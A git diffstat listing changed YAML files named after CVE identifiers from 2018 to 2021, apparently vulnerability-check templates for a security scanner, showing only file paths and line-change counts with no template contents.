http/cves/2018/CVE-2018-18925.yaml | 3 +-
http/cves/2018/CVE-2018-19136.yaml | 3 +-
http/cves/2018/CVE-2018-19137.yaml | 1 +
http/cves/2018/CVE-2018-19287.yaml | 1 +
http/cves/2018/CVE-2018-19326.yaml | 3 +-
http/cves/2018/CVE-2018-19365.yaml | 3 +-
http/cves/2018/CVE-2018-19386.yaml | 1 +
http/cves/2018/CVE-2018-19439.yaml | 1 +
http/cves/2018/CVE-2018-19458.yaml | 3 +-
http/cves/2018/CVE-2018-19749.yaml | 1 +
http/cves/2018/CVE-2018-19751.yaml | 1 +
http/cves/2018/CVE-2018-19752.yaml | 1 +
http/cves/2018/CVE-2018-19753.yaml | 3 +-
http/cves/2018/CVE-2018-19877.yaml | 1 +
http/cves/2018/CVE-2018-19892.yaml | 1 +
http/cves/2018/CVE-2018-19914.yaml | 1 +
http/cves/2018/CVE-2018-19915.yaml | 1 +
http/cves/2018/CVE-2018-20009.yaml | 1 +
http/cves/2018/CVE-2018-20010.yaml | 1 +
http/cves/2018/CVE-2018-20011.yaml | 1 +
http/cves/2018/CVE-2018-20462.yaml | 1 +
http/cves/2018/CVE-2018-20463.yaml | 3 +-
http/cves/2018/CVE-2018-20470.yaml | 1 +
http/cves/2018/CVE-2018-20526.yaml | 1 +
http/cves/2018/CVE-2018-20608.yaml | 8 ++
http/cves/2018/CVE-2018-20824.yaml | 1 +
http/cves/2018/CVE-2018-20985.yaml | 1 +
http/cves/2018/CVE-2018-2392.yaml | 1 +
http/cves/2018/CVE-2018-2791.yaml | 1 +
http/cves/2018/CVE-2018-2894.yaml | 1 +
http/cves/2018/CVE-2018-3167.yaml | 3 +-
http/cves/2018/CVE-2018-3238.yaml | 3 +-
http/cves/2018/CVE-2018-3714.yaml | 1 +
http/cves/2018/CVE-2018-3760.yaml | 1 +
http/cves/2018/CVE-2018-3810.yaml | 3 +-
http/cves/2018/CVE-2018-5230.yaml | 1 +
http/cves/2018/CVE-2018-5233.yaml | 3 +-
http/cves/2018/CVE-2018-5316.yaml | 3 +-
http/cves/2018/CVE-2018-5715.yaml | 1 +
http/cves/2018/CVE-2018-6008.yaml | 1 +
http/cves/2018/CVE-2018-6184.yaml | 1 +
http/cves/2018/CVE-2018-6200.yaml | 1 +
http/cves/2018/CVE-2018-6530.yaml | 1 +
http/cves/2018/CVE-2018-6910.yaml | 1 +
http/cves/2018/CVE-2018-7251.yaml | 1 +
http/cves/2018/CVE-2018-7422.yaml | 3 +-
http/cves/2018/CVE-2018-7467.yaml | 1 +
http/cves/2018/CVE-2018-7490.yaml | 3 +-
http/cves/2018/CVE-2018-7600.yaml | 3 +-
http/cves/2018/CVE-2018-7602.yaml | 3 +-
http/cves/2018/CVE-2018-7653.yaml | 9 +-
http/cves/2018/CVE-2018-7662.yaml | 1 +
http/cves/2018/CVE-2018-7700.yaml | 1 +
http/cves/2018/CVE-2018-7719.yaml | 3 +-
http/cves/2018/CVE-2018-8006.yaml | 3 +-
http/cves/2018/CVE-2018-8033.yaml | 3 +-
http/cves/2018/CVE-2018-8715.yaml | 3 +-
http/cves/2018/CVE-2018-8719.yaml | 3 +-
http/cves/2018/CVE-2018-8727.yaml | 1 +
http/cves/2018/CVE-2018-8770.yaml | 3 +-
http/cves/2018/CVE-2018-9118.yaml | 1 +
http/cves/2018/CVE-2018-9161.yaml | 3 +-
http/cves/2018/CVE-2018-9205.yaml | 3 +-
http/cves/2018/CVE-2018-9845.yaml | 1 +
http/cves/2018/CVE-2018-9995.yaml | 3 +-
http/cves/2019/CVE-2019-0193.yaml | 3 +-
http/cves/2019/CVE-2019-0221.yaml | 2 +-
http/cves/2019/CVE-2019-0230.yaml | 4 +-
http/cves/2019/CVE-2019-10068.yaml | 1 +
http/cves/2019/CVE-2019-10092.yaml | 3 +-
http/cves/2019/CVE-2019-10098.yaml | 3 +-
http/cves/2019/CVE-2019-1010287.yaml | 1 +
http/cves/2019/CVE-2019-1010290.yaml | 1 +
http/cves/2019/CVE-2019-10232.yaml | 3 +-
http/cves/2019/CVE-2019-10405.yaml | 1 +
http/cves/2019/CVE-2019-10475.yaml | 3 +-
http/cves/2019/CVE-2019-10692.yaml | 3 +-
http/cves/2019/CVE-2019-10717.yaml | 1 +
http/cves/2019/CVE-2019-10758.yaml | 1 +
http/cves/2019/CVE-2019-11013.yaml | 1 +
http/cves/2019/CVE-2019-11248.yaml | 3 +-
http/cves/2019/CVE-2019-11370.yaml | 1 +
http/cves/2019/CVE-2019-11510.yaml | 3 +-
http/cves/2019/CVE-2019-11580.yaml | 3 +-
http/cves/2019/CVE-2019-11581.yaml | 1 +
http/cves/2019/CVE-2019-11869.yaml | 1 +
http/cves/2019/CVE-2019-12276.yaml | 3 +-
http/cves/2019/CVE-2019-12314.yaml | 3 +-
http/cves/2019/CVE-2019-12461.yaml | 1 +
http/cves/2019/CVE-2019-12581.yaml | 1 +
http/cves/2019/CVE-2019-12583.yaml | 1 +
http/cves/2019/CVE-2019-12593.yaml | 3 +-
http/cves/2019/CVE-2019-12616.yaml | 1 +
http/cves/2019/CVE-2019-12725.yaml | 3 +-
http/cves/2019/CVE-2019-12962.yaml | 1 +
http/cves/2019/CVE-2019-12985.yaml | 1 +
http/cves/2019/CVE-2019-12986.yaml | 1 +
http/cves/2019/CVE-2019-12987.yaml | 1 +
http/cves/2019/CVE-2019-12988.yaml | 1 +
http/cves/2019/CVE-2019-12990.yaml | 1 +
http/cves/2019/CVE-2019-13101.yaml | 1 +
http/cves/2019/CVE-2019-13392.yaml | 1 +
http/cves/2019/CVE-2019-13396.yaml | 1 +
http/cves/2019/CVE-2019-13462.yaml | 1 +
http/cves/2019/CVE-2019-14205.yaml | 1 +
http/cves/2019/CVE-2019-14223.yaml | 1 +
http/cves/2019/CVE-2019-14251.yaml | 1 +
http/cves/2019/CVE-2019-14312.yaml | 1 +
http/cves/2019/CVE-2019-14322.yaml | 3 +-
http/cves/2019/CVE-2019-14470.yaml | 3 +-
http/cves/2019/CVE-2019-14530.yaml | 3 +-
http/cves/2019/CVE-2019-14696.yaml | 1 +
http/cves/2019/CVE-2019-14750.yaml | 160 ++++++++++++++-------------
http/cves/2019/CVE-2019-14789.yaml | 5 +-
http/cves/2019/CVE-2019-14974.yaml | 1 +
http/cves/2019/CVE-2019-15043.yaml | 3 +-
http/cves/2019/CVE-2019-15107.yaml | 3 +-
http/cves/2019/CVE-2019-15501.yaml | 1 +
http/cves/2019/CVE-2019-15642.yaml | 17 ++-
http/cves/2019/CVE-2019-15713.yaml | 1 +
http/cves/2019/CVE-2019-15811.yaml | 1 +
http/cves/2019/CVE-2019-15858.yaml | 1 +
http/cves/2019/CVE-2019-15859.yaml | 3 +-
http/cves/2019/CVE-2019-15889.yaml | 3 +-
http/cves/2019/CVE-2019-16057.yaml | 5 +
http/cves/2019/CVE-2019-16097.yaml | 3 +-
http/cves/2019/CVE-2019-16123.yaml | 1 +
http/cves/2019/CVE-2019-16278.yaml | 3 +-
http/cves/2019/CVE-2019-16313.yaml | 3 +-
http/cves/2019/CVE-2019-16332.yaml | 1 +
http/cves/2019/CVE-2019-16525.yaml | 1 +
http/cves/2019/CVE-2019-1653.yaml | 1 +
http/cves/2019/CVE-2019-16662.yaml | 1 +
http/cves/2019/CVE-2019-16759.yaml | 1 +
http/cves/2019/CVE-2019-16920.yaml | 3 +-
http/cves/2019/CVE-2019-16931.yaml | 1 +
http/cves/2019/CVE-2019-16932.yaml | 1 +
http/cves/2019/CVE-2019-16996.yaml | 1 +
http/cves/2019/CVE-2019-16997.yaml | 1 +
http/cves/2019/CVE-2019-17270.yaml | 3 +-
http/cves/2019/CVE-2019-17382.yaml | 4 +-
http/cves/2019/CVE-2019-17418.yaml | 1 +
http/cves/2019/CVE-2019-17444.yaml | 3 +-
http/cves/2019/CVE-2019-17503.yaml | 3 +-
http/cves/2019/CVE-2019-17506.yaml | 1 +
http/cves/2019/CVE-2019-17538.yaml | 1 +
http/cves/2019/CVE-2019-17558.yaml | 1 +
http/cves/2019/CVE-2019-17574.yaml | 3 +-
http/cves/2019/CVE-2019-17662.yaml | 11 +-
http/cves/2019/CVE-2019-1821.yaml | 1 +
http/cves/2019/CVE-2019-18371.yaml | 3 +-
http/cves/2019/CVE-2019-18393.yaml | 1 +
http/cves/2019/CVE-2019-18394.yaml | 3 +-
http/cves/2019/CVE-2019-18665.yaml | 3 +-
http/cves/2019/CVE-2019-18818.yaml | 3 +-
http/cves/2019/CVE-2019-18922.yaml | 3 +-
http/cves/2019/CVE-2019-18957.yaml | 1 +
http/cves/2019/CVE-2019-1898.yaml | 8 +-
http/cves/2019/CVE-2019-19134.yaml | 1 +
http/cves/2019/CVE-2019-19368.yaml | 3 +-
http/cves/2019/CVE-2019-1943.yaml | 1 +
http/cves/2019/CVE-2019-19781.yaml | 3 +-
http/cves/2019/CVE-2019-19824.yaml | 3 +-
http/cves/2019/CVE-2019-19908.yaml | 1 +
http/cves/2019/CVE-2019-19985.yaml | 3 +-
http/cves/2019/CVE-2019-20085.yaml | 3 +-
http/cves/2019/CVE-2019-20141.yaml | 1 +
http/cves/2019/CVE-2019-20183.yaml | 1 +
http/cves/2019/CVE-2019-20210.yaml | 1 +
http/cves/2019/CVE-2019-20224.yaml | 3 +-
http/cves/2019/CVE-2019-20933.yaml | 3 +-
http/cves/2019/CVE-2019-2578.yaml | 3 +-
http/cves/2019/CVE-2019-2579.yaml | 1 +
http/cves/2019/CVE-2019-2588.yaml | 3 +-
http/cves/2019/CVE-2019-2616.yaml | 3 +-
http/cves/2019/CVE-2019-2725.yaml | 3 +-
http/cves/2019/CVE-2019-2729.yaml | 3 +-
http/cves/2019/CVE-2019-2767.yaml | 1 +
http/cves/2019/CVE-2019-3396.yaml | 3 +-
http/cves/2019/CVE-2019-3398.yaml | 3 +-
http/cves/2019/CVE-2019-3401.yaml | 1 +
http/cves/2019/CVE-2019-3402.yaml | 1 +
http/cves/2019/CVE-2019-3403.yaml | 1 +
http/cves/2019/CVE-2019-3799.yaml | 3 +-
http/cves/2019/CVE-2019-3911.yaml | 1 +
http/cves/2019/CVE-2019-3912.yaml | 1 +
http/cves/2019/CVE-2019-3929.yaml | 5 +-
http/cves/2019/CVE-2019-5127.yaml | 4 +-
http/cves/2019/CVE-2019-5418.yaml | 3 +-
http/cves/2019/CVE-2019-5434.yaml | 1 +
http/cves/2019/CVE-2019-6112.yaml | 3 +-
http/cves/2019/CVE-2019-6340.yaml | 5 +-
http/cves/2019/CVE-2019-6715.yaml | 1 +
http/cves/2019/CVE-2019-6799.yaml | 3 +-
http/cves/2019/CVE-2019-6802.yaml | 1 +
http/cves/2019/CVE-2019-7192.yaml | 10 +-
http/cves/2019/CVE-2019-7219.yaml | 1 +
http/cves/2019/CVE-2019-7238.yaml | 3 +-
http/cves/2019/CVE-2019-7254.yaml | 3 +-
http/cves/2019/CVE-2019-7255.yaml | 1 +
http/cves/2019/CVE-2019-7256.yaml | 3 +-
http/cves/2019/CVE-2019-7275.yaml | 1 +
http/cves/2019/CVE-2019-7315.yaml | 1 +
http/cves/2019/CVE-2019-7481.yaml | 3 +-
http/cves/2019/CVE-2019-7543.yaml | 1 +
http/cves/2019/CVE-2019-7609.yaml | 1 +
http/cves/2019/CVE-2019-8086.yaml | 1 +
http/cves/2019/CVE-2019-8390.yaml | 1 +
http/cves/2019/CVE-2019-8442.yaml | 1 +
http/cves/2019/CVE-2019-8446.yaml | 3 +-
http/cves/2019/CVE-2019-8449.yaml | 3 +-
http/cves/2019/CVE-2019-8451.yaml | 1 +
http/cves/2019/CVE-2019-8903.yaml | 3 +-
http/cves/2019/CVE-2019-8937.yaml | 1 +
http/cves/2019/CVE-2019-8982.yaml | 1 +
http/cves/2019/CVE-2019-9041.yaml | 1 +
http/cves/2019/CVE-2019-9618.yaml | 1 +
http/cves/2019/CVE-2019-9670.yaml | 3 +-
http/cves/2019/CVE-2019-9726.yaml | 1 +
http/cves/2019/CVE-2019-9733.yaml | 3 +-
http/cves/2019/CVE-2019-9915.yaml | 3 +-
http/cves/2019/CVE-2019-9922.yaml | 3 +-
http/cves/2019/CVE-2019-9955.yaml | 3 +-
http/cves/2019/CVE-2019-9978.yaml | 3 +-
http/cves/2020/CVE-2020-0618.yaml | 3 +-
http/cves/2020/CVE-2020-10148.yaml | 5 +-
http/cves/2020/CVE-2020-10199.yaml | 5 +-
http/cves/2020/CVE-2020-10546.yaml | 3 +-
http/cves/2020/CVE-2020-10547.yaml | 3 +-
http/cves/2020/CVE-2020-10548.yaml | 3 +-
http/cves/2020/CVE-2020-10549.yaml | 3 +-
http/cves/2020/CVE-2020-10770.yaml | 3 +-
http/cves/2020/CVE-2020-10973.yaml | 3 +-
http/cves/2020/CVE-2020-11034.yaml | 1 +
http/cves/2020/CVE-2020-11110.yaml | 1 +
http/cves/2020/CVE-2020-11450.yaml | 3 +-
http/cves/2020/CVE-2020-11455.yaml | 3 +-
http/cves/2020/CVE-2020-11529.yaml | 1 +
http/cves/2020/CVE-2020-11530.yaml | 3 +-
http/cves/2020/CVE-2020-11546.yaml | 1 +
http/cves/2020/CVE-2020-11547.yaml | 1 +
http/cves/2020/CVE-2020-11710.yaml | 1 +
http/cves/2020/CVE-2020-11738.yaml | 3 +-
http/cves/2020/CVE-2020-11798.yaml | 11 +-
http/cves/2020/CVE-2020-11853.yaml | 1 +
http/cves/2020/CVE-2020-11854.yaml | 1 +
http/cves/2020/CVE-2020-11930.yaml | 3 +-
http/cves/2020/CVE-2020-11978.yaml | 1 +
http/cves/2020/CVE-2020-11991.yaml | 3 +-
http/cves/2020/CVE-2020-12054.yaml | 1 +
http/cves/2020/CVE-2020-12116.yaml | 3 +-
http/cves/2020/CVE-2020-12127.yaml | 1 +
http/cves/2020/CVE-2020-12447.yaml | 3 +-
http/cves/2020/CVE-2020-12478.yaml | 3 +-
http/cves/2020/CVE-2020-12720.yaml | 3 +-
http/cves/2020/CVE-2020-12800.yaml | 3 +-
http/cves/2020/CVE-2020-13117.yaml | 1 +
http/cves/2020/CVE-2020-13121.yaml | 1 +
http/cves/2020/CVE-2020-13158.yaml | 3 +-
http/cves/2020/CVE-2020-13167.yaml | 2 +-
http/cves/2020/CVE-2020-13258.yaml | 1 +
http/cves/2020/CVE-2020-13379.yaml | 3 +-
http/cves/2020/CVE-2020-13405.yaml | 1 +
http/cves/2020/CVE-2020-13483.yaml | 1 +
http/cves/2020/CVE-2020-13700.yaml | 3 +-
http/cves/2020/CVE-2020-13820.yaml | 1 +
http/cves/2020/CVE-2020-13927.yaml | 3 +-
http/cves/2020/CVE-2020-13937.yaml | 1 +
http/cves/2020/CVE-2020-13942.yaml | 2 +-
http/cves/2020/CVE-2020-13945.yaml | 3 +-
http/cves/2020/CVE-2020-14092.yaml | 1 +
http/cves/2020/CVE-2020-14144.yaml | 3 +-
http/cves/2020/CVE-2020-14179.yaml | 1 +
http/cves/2020/CVE-2020-14181.yaml | 3 +-
http/cves/2020/CVE-2020-14408.yaml | 1 +
http/cves/2020/CVE-2020-14413.yaml | 1 +
http/cves/2020/CVE-2020-14750.yaml | 3 +-
http/cves/2020/CVE-2020-14864.yaml | 3 +-
http/cves/2020/CVE-2020-14882.yaml | 3 +-
http/cves/2020/CVE-2020-14883.yaml | 3 +-
http/cves/2020/CVE-2020-15050.yaml | 3 +-
http/cves/2020/CVE-2020-15129.yaml | 1 +
http/cves/2020/CVE-2020-15148.yaml | 3 +-
http/cves/2020/CVE-2020-15227.yaml | 3 +-
http/cves/2020/CVE-2020-15500.yaml | 1 +
http/cves/2020/CVE-2020-15505.yaml | 1 +
http/cves/2020/CVE-2020-15568.yaml | 2 +-
http/cves/2020/CVE-2020-15867.yaml | 3 +-
http/cves/2020/CVE-2020-15895.yaml | 1 +
http/cves/2020/CVE-2020-15920.yaml | 3 +-
http/cves/2020/CVE-2020-16139.yaml | 1 +
http/cves/2020/CVE-2020-16846.yaml | 4 +-
http/cves/2020/CVE-2020-16952.yaml | 3 +-
http/cves/2020/CVE-2020-17362.yaml | 1 +
http/cves/2020/CVE-2020-17453.yaml | 1 +
http/cves/2020/CVE-2020-17456.yaml | 1 +
http/cves/2020/CVE-2020-17463.yaml | 16 +--
http/cves/2020/CVE-2020-17496.yaml | 3 +-
http/cves/2020/CVE-2020-17505.yaml | 1 +
http/cves/2020/CVE-2020-17506.yaml | 3 +-
http/cves/2020/CVE-2020-17518.yaml | 3 +-
http/cves/2020/CVE-2020-17519.yaml | 3 +-
http/cves/2020/CVE-2020-17526.yaml | 3 +-
http/cves/2020/CVE-2020-17530.yaml | 3 +-
http/cves/2020/CVE-2020-18268.yaml | 1 +
http/cves/2020/CVE-2020-19282.yaml | 1 +
http/cves/2020/CVE-2020-19283.yaml | 1 +
http/cves/2020/CVE-2020-19295.yaml | 3 +-
http/cves/2020/CVE-2020-19360.yaml | 3 +-
http/cves/2020/CVE-2020-1943.yaml | 1 +
http/cves/2020/CVE-2020-19515.yaml | 1 +
http/cves/2020/CVE-2020-1956.yaml | 1 +
http/cves/2020/CVE-2020-19625.yaml | 1 +
http/cves/2020/CVE-2020-20285.yaml | 1 +
http/cves/2020/CVE-2020-20300.yaml | 3 +-
http/cves/2020/CVE-2020-2036.yaml | 3 +-
http/cves/2020/CVE-2020-2096.yaml | 1 +
http/cves/2020/CVE-2020-20982.yaml | 3 +-
http/cves/2020/CVE-2020-20988.yaml | 1 +
http/cves/2020/CVE-2020-21012.yaml | 3 +-
http/cves/2020/CVE-2020-2103.yaml | 1 +
http/cves/2020/CVE-2020-21224.yaml | 3 +-
http/cves/2020/CVE-2020-2140.yaml | 3 +-
http/cves/2020/CVE-2020-22208.yaml | 1 +
http/cves/2020/CVE-2020-22209.yaml | 1 +
http/cves/2020/CVE-2020-22210.yaml | 1 +
http/cves/2020/CVE-2020-22211.yaml | 1 +
http/cves/2020/CVE-2020-22840.yaml | 1 +
http/cves/2020/CVE-2020-23015.yaml | 1 +
http/cves/2020/CVE-2020-23517.yaml | 1 +
http/cves/2020/CVE-2020-23575.yaml | 1 +
http/cves/2020/CVE-2020-23697.yaml | 1 +
http/cves/2020/CVE-2020-23972.yaml | 4 +-
http/cves/2020/CVE-2020-24148.yaml | 3 +-
http/cves/2020/CVE-2020-24186.yaml | 3 +-
http/cves/2020/CVE-2020-24223.yaml | 1 +
http/cves/2020/CVE-2020-24312.yaml | 3 +-
http/cves/2020/CVE-2020-24391.yaml | 3 +-
http/cves/2020/CVE-2020-24550.yaml | 1 +
http/cves/2020/CVE-2020-24571.yaml | 1 +
http/cves/2020/CVE-2020-24579.yaml | 3 +-
http/cves/2020/CVE-2020-24589.yaml | 3 +-
http/cves/2020/CVE-2020-24902.yaml | 3 +-
http/cves/2020/CVE-2020-24903.yaml | 1 +
http/cves/2020/CVE-2020-24912.yaml | 1 +
http/cves/2020/CVE-2020-24949.yaml | 1 +
http/cves/2020/CVE-2020-25078.yaml | 1 +
http/cves/2020/CVE-2020-25213.yaml | 3 +-
http/cves/2020/CVE-2020-25223.yaml | 3 +-
http/cves/2020/CVE-2020-25495.yaml | 1 +
http/cves/2020/CVE-2020-25506.yaml | 1 +
http/cves/2020/CVE-2020-2551.yaml | 1 +
http/cves/2020/CVE-2020-25540.yaml | 3 +-
http/cves/2020/CVE-2020-25780.yaml | 1 +
http/cves/2020/CVE-2020-25864.yaml | 1 +
http/cves/2020/CVE-2020-26073.yaml | 4 +-
http/cves/2020/CVE-2020-26153.yaml | 1 +
http/cves/2020/CVE-2020-26214.yaml | 3 +-
http/cves/2020/CVE-2020-26217.yaml | 1 +
http/cves/2020/CVE-2020-26248.yaml | 3 +-
http/cves/2020/CVE-2020-26258.yaml | 1 +
http/cves/2020/CVE-2020-26413.yaml | 3 +-
http/cves/2020/CVE-2020-26876.yaml | 1 +
http/cves/2020/CVE-2020-26919.yaml | 3 +-
http/cves/2020/CVE-2020-26948.yaml | 3 +-
http/cves/2020/CVE-2020-27191.yaml | 3 +-
http/cves/2020/CVE-2020-2733.yaml | 3 +-
http/cves/2020/CVE-2020-27361.yaml | 1 +
http/cves/2020/CVE-2020-27467.yaml | 3 +-
http/cves/2020/CVE-2020-27481.yaml | 3 +-
http/cves/2020/CVE-2020-27735.yaml | 3 +-
http/cves/2020/CVE-2020-27866.yaml | 1 +
http/cves/2020/CVE-2020-27982.yaml | 3 +-
http/cves/2020/CVE-2020-27986.yaml | 1 +
http/cves/2020/CVE-2020-28185.yaml | 12 +-
http/cves/2020/CVE-2020-28188.yaml | 3 +-
http/cves/2020/CVE-2020-28208.yaml | 3 +-
http/cves/2020/CVE-2020-28351.yaml | 3 +-
http/cves/2020/CVE-2020-28871.yaml | 3 +-
http/cves/2020/CVE-2020-28976.yaml | 3 +-
http/cves/2020/CVE-2020-29164.yaml | 1 +
http/cves/2020/CVE-2020-29227.yaml | 3 +-
http/cves/2020/CVE-2020-29284.yaml | 3 +-
http/cves/2020/CVE-2020-29395.yaml | 3 +-
http/cves/2020/CVE-2020-29453.yaml | 1 +
http/cves/2020/CVE-2020-29583.yaml | 3 +-
http/cves/2020/CVE-2020-29597.yaml | 3 +-
http/cves/2020/CVE-2020-3187.yaml | 3 +-
http/cves/2020/CVE-2020-3452.yaml | 7 +-
http/cves/2020/CVE-2020-35234.yaml | 3 +-
http/cves/2020/CVE-2020-35338.yaml | 3 +-
http/cves/2020/CVE-2020-35476.yaml | 3 +-
http/cves/2020/CVE-2020-35489.yaml | 3 +-
http/cves/2020/CVE-2020-35580.yaml | 3 +-
http/cves/2020/CVE-2020-35598.yaml | 3 +-
http/cves/2020/CVE-2020-35713.yaml | 3 +-
http/cves/2020/CVE-2020-35729.yaml | 4 +-
http/cves/2020/CVE-2020-35736.yaml | 3 +-
http/cves/2020/CVE-2020-35749.yaml | 1 +
http/cves/2020/CVE-2020-35774.yaml | 1 +
http/cves/2020/CVE-2020-3580.yaml | 1 +
http/cves/2020/CVE-2020-35846.yaml | 3 +-
http/cves/2020/CVE-2020-35847.yaml | 3 +-
http/cves/2020/CVE-2020-35848.yaml | 3 +-
http/cves/2020/CVE-2020-35951.yaml | 3 +-
http/cves/2020/CVE-2020-35984.yaml | 1 +
http/cves/2020/CVE-2020-35985.yaml | 1 +
http/cves/2020/CVE-2020-35986.yaml | 1 +
http/cves/2020/CVE-2020-35987.yaml | 1 +
http/cves/2020/CVE-2020-36112.yaml | 3 +-
http/cves/2020/CVE-2020-36289.yaml | 3 +-
http/cves/2020/CVE-2020-36365.yaml | 1 +
http/cves/2020/CVE-2020-36510.yaml | 3 +-
http/cves/2020/CVE-2020-4463.yaml | 3 +-
http/cves/2020/CVE-2020-5191.yaml | 1 +
http/cves/2020/CVE-2020-5192.yaml | 3 +-
http/cves/2020/CVE-2020-5284.yaml | 3 +-
http/cves/2020/CVE-2020-5307.yaml | 1 +
http/cves/2020/CVE-2020-5405.yaml | 1 +
http/cves/2020/CVE-2020-5410.yaml | 3 +-
http/cves/2020/CVE-2020-5412.yaml | 5 +-
http/cves/2020/CVE-2020-5775.yaml | 3 +-
http/cves/2020/CVE-2020-5776.yaml | 3 +-
http/cves/2020/CVE-2020-5777.yaml | 3 +-
http/cves/2020/CVE-2020-5847.yaml | 3 +-
http/cves/2020/CVE-2020-5902.yaml | 1 +
http/cves/2020/CVE-2020-6171.yaml | 1 +
http/cves/2020/CVE-2020-6207.yaml | 1 +
http/cves/2020/CVE-2020-6287.yaml | 1 +
http/cves/2020/CVE-2020-6308.yaml | 1 +
http/cves/2020/CVE-2020-6637.yaml | 3 +-
http/cves/2020/CVE-2020-7107.yaml | 1 +
http/cves/2020/CVE-2020-7136.yaml | 3 +-
http/cves/2020/CVE-2020-7209.yaml | 3 +-
http/cves/2020/CVE-2020-7318.yaml | 1 +
http/cves/2020/CVE-2020-7796.yaml | 3 +-
http/cves/2020/CVE-2020-7943.yaml | 3 +-
http/cves/2020/CVE-2020-7961.yaml | 3 +-
http/cves/2020/CVE-2020-7980.yaml | 3 +-
http/cves/2020/CVE-2020-8115.yaml | 1 +
http/cves/2020/CVE-2020-8163.yaml | 3 +-
http/cves/2020/CVE-2020-8191.yaml | 1 +
http/cves/2020/CVE-2020-8193.yaml | 3 +-
http/cves/2020/CVE-2020-8194.yaml | 3 +-
http/cves/2020/CVE-2020-8209.yaml | 1 +
http/cves/2020/CVE-2020-8497.yaml | 1 +
http/cves/2020/CVE-2020-8512.yaml | 1 +
http/cves/2020/CVE-2020-8515.yaml | 3 +-
http/cves/2020/CVE-2020-8641.yaml | 3 +-
http/cves/2020/CVE-2020-8644.yaml | 3 +-
http/cves/2020/CVE-2020-8654.yaml | 3 +-
http/cves/2020/CVE-2020-8771.yaml | 1 +
http/cves/2020/CVE-2020-8772.yaml | 1 +
http/cves/2020/CVE-2020-8813.yaml | 3 +-
http/cves/2020/CVE-2020-8982.yaml | 3 +-
http/cves/2020/CVE-2020-9036.yaml | 1 +
http/cves/2020/CVE-2020-9043.yaml | 3 +-
http/cves/2020/CVE-2020-9047.yaml | 3 +-
http/cves/2020/CVE-2020-9054.yaml | 3 +-
http/cves/2020/CVE-2020-9315.yaml | 1 +
http/cves/2020/CVE-2020-9344.yaml | 7 +-
http/cves/2020/CVE-2020-9376.yaml | 1 +
http/cves/2020/CVE-2020-9402.yaml | 3 +-
http/cves/2020/CVE-2020-9425.yaml | 3 +-
http/cves/2020/CVE-2020-9483.yaml | 3 +-
http/cves/2020/CVE-2020-9484.yaml | 3 +-
http/cves/2020/CVE-2020-9496.yaml | 3 +-
http/cves/2020/CVE-2020-9757.yaml | 3 +-
http/cves/2021/CVE-2021-1472.yaml | 5 +-
http/cves/2021/CVE-2021-1497.yaml | 2 +-
http/cves/2021/CVE-2021-1498.yaml | 1 +
http/cves/2021/CVE-2021-1499.yaml | 1 +
http/cves/2021/CVE-2021-20031.yaml | 1 +
http/cves/2021/CVE-2021-20038.yaml | 3 +-
http/cves/2021/CVE-2021-20090.yaml | 3 +-
http/cves/2021/CVE-2021-20091.yaml | 3 +-
http/cves/2021/CVE-2021-20092.yaml | 3 +-
http/cves/2021/CVE-2021-20114.yaml | 1 +
http/cves/2021/CVE-2021-20123.yaml | 3 +-
http/cves/2021/CVE-2021-20124.yaml | 3 +-
http/cves/2021/CVE-2021-20137.yaml | 3 +-
http/cves/2021/CVE-2021-20150.yaml | 3 +-
http/cves/2021/CVE-2021-20158.yaml | 4 +-
http/cves/2021/CVE-2021-20167.yaml | 3 +-
http/cves/2021/CVE-2021-20323.yaml | 3 +-
http/cves/2021/CVE-2021-20792.yaml | 1 +
http/cves/2021/CVE-2021-20837.yaml | 3 +-
http/cves/2021/CVE-2021-21087.yaml | 2 +
http/cves/2021/CVE-2021-21234.yaml | 3 +-
http/cves/2021/CVE-2021-21287.yaml | 3 +-
http/cves/2021/CVE-2021-21307.yaml | 3 +-
http/cves/2021/CVE-2021-21311.yaml | 1 +
http/cves/2021/CVE-2021-21315.yaml | 3 +-
http/cves/2021/CVE-2021-21345.yaml | 3 +-
http/cves/2021/CVE-2021-21351.yaml | 3 +-
http/cves/2021/CVE-2021-21389.yaml | 1 +
http/cves/2021/CVE-2021-21402.yaml | 3 +-
http/cves/2021/CVE-2021-21479.yaml | 3 +-
http/cves/2021/CVE-2021-21745.yaml | 3 +-
http/cves/2021/CVE-2021-21799.yaml | 1 +
http/cves/2021/CVE-2021-21800.yaml | 1 +
http/cves/2021/CVE-2021-21801.yaml | 1 +
http/cves/2021/CVE-2021-21802.yaml | 1 +
http/cves/2021/CVE-2021-21803.yaml | 1 +
http/cves/2021/CVE-2021-21805.yaml | 1 +
http/cves/2021/CVE-2021-21816.yaml | 3 +-
http/cves/2021/CVE-2021-21881.yaml | 3 +-
http/cves/2021/CVE-2021-21972.yaml | 3 +-
http/cves/2021/CVE-2021-21973.yaml | 3 +-
http/cves/2021/CVE-2021-21975.yaml | 3 +-
http/cves/2021/CVE-2021-21978.yaml | 5 +-
http/cves/2021/CVE-2021-21985.yaml | 3 +-
http/cves/2021/CVE-2021-22005.yaml | 5 +-
http/cves/2021/CVE-2021-22053.yaml | 3 +-
http/cves/2021/CVE-2021-22054.yaml | 3 +-
http/cves/2021/CVE-2021-22122.yaml | 1 +
http/cves/2021/CVE-2021-22145.yaml | 3 +-
http/cves/2021/CVE-2021-22205.yaml | 3 +-
http/cves/2021/CVE-2021-22214.yaml | 3 +-
http/cves/2021/CVE-2021-22502.yaml | 3 +-
http/cves/2021/CVE-2021-22707.yaml | 10 ++
http/cves/2021/CVE-2021-22873.yaml | 3 +-
http/cves/2021/CVE-2021-22911.yaml | 3 +-
http/cves/2021/CVE-2021-22986.yaml | 1 +
http/cves/2021/CVE-2021-23241.yaml | 3 +-
http/cves/2021/CVE-2021-24145.yaml | 3 +-
http/cves/2021/CVE-2021-24146.yaml | 1 +
http/cves/2021/CVE-2021-24150.yaml | 3 +-
http/cves/2021/CVE-2021-24155.yaml | 3 +-
http/cves/2021/CVE-2021-24165.yaml | 1 +
http/cves/2021/CVE-2021-24169.yaml | 1 +
http/cves/2021/CVE-2021-24176.yaml | 1 +
http/cves/2021/CVE-2021-24210.yaml | 1 +
http/cves/2021/CVE-2021-24214.yaml | 1 +
http/cves/2021/CVE-2021-24226.yaml | 1 +
http/cves/2021/CVE-2021-24227.yaml | 1 +
http/cves/2021/CVE-2021-24235.yaml | 1 +
http/cves/2021/CVE-2021-24236.yaml | 3 +-
http/cves/2021/CVE-2021-24237.yaml | 1 +
http/cves/2021/CVE-2021-24239.yaml | 1 +
http/cves/2021/CVE-2021-24245.yaml | 1 +
http/cves/2021/CVE-2021-24274.yaml | 1 +
http/cves/2021/CVE-2021-24275.yaml | 1 +
http/cves/2021/CVE-2021-24276.yaml | 1 +
